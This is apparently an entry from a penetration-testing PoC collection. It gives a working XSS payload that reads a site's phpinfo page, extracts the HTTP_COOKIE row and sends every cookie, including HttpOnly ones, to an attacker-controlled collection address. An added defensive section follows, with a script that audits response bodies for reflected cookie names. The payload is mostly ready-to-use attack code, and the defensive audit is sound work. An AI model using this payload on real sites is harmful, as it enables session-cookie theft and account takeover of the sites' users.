Penetration_Testing_POC/通过phpinfo获取cookie突破httponly.md

### `XSS` code
```javascript
<script>
var xmlHttp; // request object shared by the functions below

function createXmlHttp() {
    if (window.XMLHttpRequest) {
        xmlHttp = new XMLHttpRequest();
    } else {
        xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
    }
}

function getS() {
    var Url = 'PHPinfo的地址'; // placeholder: address of the phpinfo page
    createXmlHttp();
    xmlHttp.onreadystatechange = writeS;
    xmlHttp.open("GET", Url, true);
    xmlHttp.send(null);
}

function writeS() {
    if (xmlHttp.readyState == 4) {
        // phpinfo prints the request's Cookie header in its HTTP_COOKIE table row
        var x = xmlHttp.responseText.match(/HTTP_COOKIE.+?<\/td><td.+?>([\w\W]+?)<\/td>/);
        if (x) {
            // placeholder: your own cookie-receiving address
            var url = "自己收取cookie的地址" + x[1]; // x holds all cookies, including the httponly ones
            createXmlHttp();
            xmlHttp.open("GET", url, true);
            xmlHttp.send(null);
        }
    }
}

getS();
</script>
```
Source: https://www.t00ls.net/thread-55915-1-1.html https://www.t00ls.net/thread-55912-1-1.html

For note-taking only. Do not misuse.
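
A defensive counterpart, added here and not part of the original note: a check a site owner can run over response bodies from their own application to find pages that reflect the `Cookie` header in phpinfo-style output, which is what makes `HttpOnly` cookies readable to script. The function names, the sample markup and the cookie names are constructed for illustration.

```javascript
// Added example (not from the original note). Reports cookie NAMES only;
// cookie values are never returned or logged.

// Same table row the snippet above reads: an HTTP_COOKIE label cell
// followed by a value cell.
const COOKIE_ROW = /HTTP_COOKIE[^<]*<\/td>\s*<td[^>]*>([\s\S]*?)<\/td>/;

// Names of the cookies reflected in the body, or [] if none are found.
function exposedCookieNames(body) {
  const m = COOKIE_ROW.exec(body);
  if (!m) return [];
  return m[1].split(';')
    .filter(pair => pair.includes('='))        // skips cells such as "no value"
    .map(pair => pair.split('=')[0].trim())
    .filter(name => /^[\w.-]+$/.test(name));   // keep plain cookie names only
}

// httpOnlyNames: cookies the application sets with the HttpOnly flag (assumed input).
function auditBody(body, httpOnlyNames) {
  const names = exposedCookieNames(body);
  return {
    reflectsCookies: names.length > 0,
    leakedHttpOnly: names.filter(n => httpOnlyNames.includes(n)),
  };
}

// Constructed sample bodies, modelled on the phpinfo table layout.
const SAMPLE_PHPINFO = [
  '<table>',
  '<tr><td class="e">HTTP_HOST </td><td class="v">app.example.test </td></tr>',
  '<tr><td class="e">HTTP_COOKIE </td><td class="v">PHPSESSID=REDACTED; theme=dark </td></tr>',
  '</table>',
].join('\n');
const SAMPLE_NORMAL = '<html><body><p>Hello</p></body></html>';

console.log(auditBody(SAMPLE_PHPINFO, ['PHPSESSID']));
console.log(auditBody(SAMPLE_NORMAL, ['PHPSESSID']));
```

Any hit means the page should be removed from the deployed site or the function disabled, for example with the `disable_functions` directive in `php.ini`.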